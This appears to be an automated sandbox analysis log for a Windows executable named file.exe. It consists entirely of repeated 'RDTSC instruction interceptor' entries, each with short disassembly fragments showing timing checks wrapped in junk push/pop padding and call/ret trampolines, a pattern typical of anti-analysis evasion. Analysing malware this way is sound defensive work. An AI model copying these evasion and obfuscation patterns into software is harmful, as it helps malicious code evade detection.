                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F00808 second address: F0080E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F02591 second address: F025B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4178B56570h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F4178B56566h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F025B1 second address: F025B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0365F second address: F036E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F4178B56568h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 pushad 0x00000025 mov ch, 86h 0x00000027 jmp 00007F4178B56579h 0x0000002c popad 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F4178B56568h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 push 00000000h 0x0000004b or edi, dword ptr [ebp+122D391Dh] 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F4178B56574h 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F04512 second address: F04532 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F417883CDD1h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F417883CDC8h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F04532 second address: F04566 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4178B56568h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push eax 0x0000000e mov dword ptr [ebp+122D254Ah], ecx 0x00000014 pop ebx 0x00000015 push 00000000h 0x00000017 or dword ptr [ebp+122D231Bh], ecx 0x0000001d push 00000000h 0x0000001f pushad 0x00000020 mov esi, dword ptr [ebp+122D275Dh] 0x00000026 mov esi, dword ptr [ebp+122D3849h] 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0386A second address: F0386E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F04566 second address: F04570 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F047E9 second address: F04812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F417883CDD7h 0x0000000c popad 0x0000000d push eax 0x0000000e jbe 00007F417883CDD4h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F064F7 second address: F06592 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F4178B56568h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 jmp 00007F4178B56574h 0x0000002d call 00007F4178B56570h 0x00000032 mov edi, dword ptr [ebp+122D368Dh] 0x00000038 pop ebx 0x00000039 push 00000000h 0x0000003b sub dword ptr [ebp+122D227Dh], ebx 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push edx 0x00000046 call 00007F4178B56568h 0x0000004b pop edx 0x0000004c mov dword ptr [esp+04h], edx 0x00000050 add dword ptr [esp+04h], 00000017h 0x00000058 inc edx 0x00000059 push edx 0x0000005a ret 0x0000005b pop edx 0x0000005c ret 0x0000005d call 00007F4178B5656Ah 0x00000062 mov ebx, dword ptr [ebp+1244D0CCh] 0x00000068 pop edi 0x00000069 xchg eax, esi 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F056F1 second address: F056FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F06592 second address: F06596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F06596 second address: F0659C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0659C second address: F065B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4178B56574h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F065B4 second address: F065D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F417883CDD8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F065D7 second address: F065DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B695 second address: F0B6A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C67E second address: F0C713 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B56576h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F4178B56568h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 mov ebx, edx 0x0000002b pop edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F4178B56568h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 0000001Ah 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 mov di, cx 0x0000004b xchg eax, esi 0x0000004c jmp 00007F4178B56571h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push ecx 0x00000055 jmp 00007F4178B56571h 0x0000005a pop ecx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C713 second address: F0C719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F08905 second address: F08909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F09A66 second address: F09A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B87D second address: F0B888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F4178B56566h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B888 second address: F0B895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0D6A9 second address: F0D6C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4178B56575h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B895 second address: F0B89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0D6C9 second address: F0D72C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4178B56578h 0x00000008 jmp 00007F4178B56572h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 jng 00007F4178B56566h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 mov dword ptr [ebp+122D1E69h], edi 0x0000001f pop ebx 0x00000020 mov dword ptr [ebp+12453C40h], edx 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F4178B56568h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 00000019h 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 add dword ptr [ebp+122D320Eh], edx 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0D72C second address: F0D732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17C23 second address: F17C29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17C29 second address: F17C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F417883CDD5h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17C44 second address: F17C4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F4178B56566h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17F2A second address: F17F3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F417883CDC6h 0x00000009 jng 00007F417883CDC6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17F3B second address: F17F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jo 00007F4178B56566h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DC42 second address: F1DC46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DC46 second address: F1DC4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DC4C second address: F1DC9E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F417883CDD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F417883CDD8h 0x00000011 pushad 0x00000012 jne 00007F417883CDC6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F417883CDCBh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DC9E second address: F1DCBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B56571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F4178B56566h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DCBF second address: F1DCC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DCC5 second address: F1DCDB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jg 00007F4178B56574h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F23E87 second address: F23E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB39DD second address: EB39E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4178B56566h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2321C second address: F23220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F234E0 second address: F234EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jno 00007F4178B56566h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2367F second address: F23698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDCDh 0x00000007 js 00007F417883CDCEh 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F23BA6 second address: F23BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F23CE3 second address: F23CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F290A2 second address: F290AC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27F09 second address: F27F13 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F417883CDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27F13 second address: F27F28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B56570h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27F28 second address: F27F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 jc 00007F417883CDC6h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCBAC second address: EFCBC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B56577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCBC7 second address: EFCBCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCCB1 second address: EFCCB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCCB6 second address: EFCCBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCD7E second address: EFCD98 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4178B5656Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCFC8 second address: EFD019 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a xchg eax, esi 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F417883CDC8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 jmp 00007F417883CDCFh 0x0000002a push eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD103 second address: EFD107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD2E1 second address: EFD333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F417883CDD0h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f nop 0x00000010 or cx, EB70h 0x00000015 push 00000004h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F417883CDC8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 sub dword ptr [ebp+12453D93h], edx 0x00000037 add edx, dword ptr [ebp+122DB75Fh] 0x0000003d push eax 0x0000003e pushad 0x0000003f pushad 0x00000040 push esi 0x00000041 pop esi 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD333 second address: EFD33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD7D3 second address: EFD7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD7D7 second address: EFD7DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD998 second address: EFD99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD99D second address: EFD9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4178B56575h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFDA73 second address: EFDAA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F417883CDD7h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFDAA0 second address: EFDAA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFDAA6 second address: EFDAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F281B3 second address: F281B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F281B7 second address: F281BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F281BD second address: F281C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F281C9 second address: F281EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnc 00007F417883CDC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F281EC second address: F281FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F281FF second address: F28203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28203 second address: F28207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28207 second address: F2820D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28BD4 second address: F28BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4178B56576h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28BEE second address: F28BF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28BF8 second address: F28C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4178B56576h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28C12 second address: F28C1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E93E second address: F2E9A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B5656Ch 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a ja 00007F4178B56566h 0x00000010 pop eax 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jne 00007F4178B565BBh 0x00000019 js 00007F4178B56591h 0x0000001f jmp 00007F4178B56574h 0x00000024 jmp 00007F4178B56577h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F4178B56570h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E9A3 second address: F2E9A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E9A7 second address: F2E9AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2EF1B second address: F2EF2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDCEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2F1D4 second address: F2F1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F4178B5656Fh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F36D16 second address: F36D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F36D1A second address: F36D1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F371D0 second address: F371D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3C768 second address: F3C76D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3C76D second address: F3C772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
